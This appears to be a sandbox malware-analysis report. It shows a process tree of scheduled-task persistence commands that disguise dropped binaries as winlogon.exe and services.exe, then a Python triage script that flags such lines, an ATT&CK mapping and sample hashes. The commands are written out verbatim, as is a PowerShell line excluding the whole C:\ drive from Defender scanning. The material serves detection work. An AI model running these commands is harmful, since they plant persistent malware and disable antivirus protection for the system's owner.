C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\en-US\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\en-US\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\en-US\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1716
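The process tree above shows the whole persistence routine as plain command lines: 54 schtasks /create calls that register copies of the sample under core-process names (for each copy an ONLOGON task with /rl HIGHEST plus MINUTE tasks that relaunch it every few minutes), a PowerShell Add-MpPreference call that excludes the entire C:\ drive from Defender scanning, a batch file run from the user's Temp directory, and a w32tm /stripchart call of the kind batch droppers commonly use as a sleep substitute before starting the dropped binary. The Python below is an added example, not code from the sandbox or from the sample, that parses such command lines into verdicts; the sample commands are copied from the tree plus one constructed benign task, and the SYSTEM_NAMES list, the 15-minute watchdog threshold and the verdict names are assumptions made here.

```python
import re
from dataclasses import dataclass

# Names the dropper borrows from core Windows processes (assumed list); a genuine copy of
# any of these starts from C:\Windows, never from Recovery, MSOCache or a user profile.
SYSTEM_NAMES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "services.exe",
                "lsm.exe", "dwm.exe", "spoolsv.exe", "explorer.exe", "lsass.exe"}
WATCHDOG_MAX_MINUTES = 15  # assumed threshold for "relaunch every few minutes" tasks


@dataclass
class Verdict:
    kind: str
    detail: str


def tokenize(cmd: str) -> list:
    """Split a Windows command line on whitespace, keeping "quoted" arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def parse_switches(tokens: list) -> dict:
    """schtasks-style '/sw value' pairs -> {'sw': 'value'}; bare switches such as /f -> True."""
    opts, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def triage_command(cmd: str) -> list:
    """Return the Verdicts one command line earns; an empty list means nothing notable."""
    tokens = tokenize(cmd)
    if not tokens:
        return []
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    verdicts = []
    if exe == "schtasks.exe":
        opts = parse_switches(tokens[1:])
        # The sample wraps the action path in single quotes inside the double quotes: "'C:\...\smss.exe'"
        target = str(opts.get("tr", "")).strip("'")
        base = target.rsplit("\\", 1)[-1].lower()
        if "create" in opts and base in SYSTEM_NAMES and not target.lower().startswith("c:\\windows\\"):
            reasons = [f"{base} launched from {target}"]
            mo = str(opts.get("mo", ""))
            if str(opts.get("sc", "")).upper() == "MINUTE" and mo.isdigit() and int(mo) <= WATCHDOG_MAX_MINUTES:
                reasons.append(f"re-launched every {mo} min (watchdog)")
            if str(opts.get("rl", "")).upper() == "HIGHEST":
                reasons.append("runs with highest privileges")
            verdicts.append(Verdict("masquerading_scheduled_task", f"/tn {opts.get('tn')}: " + "; ".join(reasons)))
    elif exe in ("powershell", "powershell.exe", "pwsh.exe"):
        m = re.search(r"Add-MpPreference\b.*?-ExclusionPath\s+['\"]?([^'\"\s]+)", cmd, re.IGNORECASE)
        if m:
            scope = "entire drive" if re.fullmatch(r"[A-Za-z]:\\?", m.group(1)) else "path"
            verdicts.append(Verdict("defender_exclusion", f"{scope} {m.group(1)} excluded from Defender scanning"))
    elif exe == "cmd.exe":
        for tok in tokens[1:]:
            if tok.lower().endswith(".bat") and "\\appdata\\local\\temp\\" in tok.lower():
                verdicts.append(Verdict("batch_from_temp", tok))
    elif exe in ("w32tm", "w32tm.exe") and "/stripchart" in (t.lower() for t in tokens):
        period = re.search(r"/period:(\d+)", cmd, re.IGNORECASE)
        samples = re.search(r"/samples:(\d+)", cmd, re.IGNORECASE)
        verdicts.append(Verdict("w32tm_delay", "stripchart period=%s samples=%s (sleep substitute)"
                                % (period.group(1) if period else "?", samples.group(1) if samples else "?")))
    return verdicts


def triage_report(commands: list) -> list:
    return [v for cmd in commands for v in triage_command(cmd)]


# Command lines copied from the process tree, plus one constructed benign task at the end.
SAMPLE_COMMANDS = [
    r'''schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Downloads\smss.exe'" /f''',
    r'''schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\en-US\services.exe'" /rl HIGHEST /f''',
    r"""powershell -Command Add-MpPreference -ExclusionPath 'C:\'""",
    r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1gqmGK9flh.bat"',
    r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2",
    r'schtasks.exe /create /tn "NightlyBackup" /sc DAILY /tr "C:\Tools\backup.exe" /f',  # constructed, benign
]

if __name__ == "__main__":
    for v in triage_report(SAMPLE_COMMANDS):
        print(f"{v.kind:28} {v.detail}")
```

Only the name/location mismatch produces a scheduled-task verdict; the MINUTE schedule and /rl HIGHEST are reported as supporting detail so that a legitimate frequent task is not flagged on its own. Note that schtasks is spawned with no parent in the tree ("Process spawned unexpected child process"), which is what the COM Task Scheduler path looks like when the caller uses the API rather than a visible schtasks.exe child of the sample.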
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
Scheduled Task/Job (1)
Privilege Escalation
Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
Scheduled Task/Job (1)
Downloads
-
Filesize
2.7MB
MD5 a41f32a91dbcdbce4c228699132b93c9
SHA1 d0bd341cffc773cb21f11867dda877229184e183
SHA256 35c3938824834811cd233f1ea6984bb924073e3ea764dfacd7470fd9ba0deedf
SHA512 01d37451651c142fd97895a58e692ca2c730d3bc7bc81fd32e6c0d5ba9f00742f9383d5ca6694e645a99d8e95502db5f783ed3c83b4a334663c287648b9d44b9
-
Filesize
223B
MD5 fc1767123a892d7ae259539f02430ce7
SHA1 e58886076b05bce72d410a934740be6b7807f8b4
SHA256 944e62bc33948ada15bf3eff5d83e9ee51f8829097dcf620cb124aa2fd8c86fd
SHA512 8259a18c6f6440f09676545242b2d486064ceca6ca1ad9f2c5883e8c09cdeae3f2c2a35a34de01e9670447ec4e4158a13b18ef02391ec3115f4e6a499949a607
-
Filesize
2.7MB
MD5 8cdae0ef9f7f5ab79ec5671644e1a0f0
SHA1 dfae9279327bb5658e9d95daae768bfaf4dca42f
SHA256 e4c8b1c4527c76289bb4247f0a02d3dd85545bdc59530f005941455d05826aed
SHA512 828146a24cc9ddac7e6e4f80df37356cbaf1bf93be1540b9cc3c5e49c7a46ef49f74ef48ba23998b5c388575aa792cc3f43043aadb15ff5b21eff841f49171f6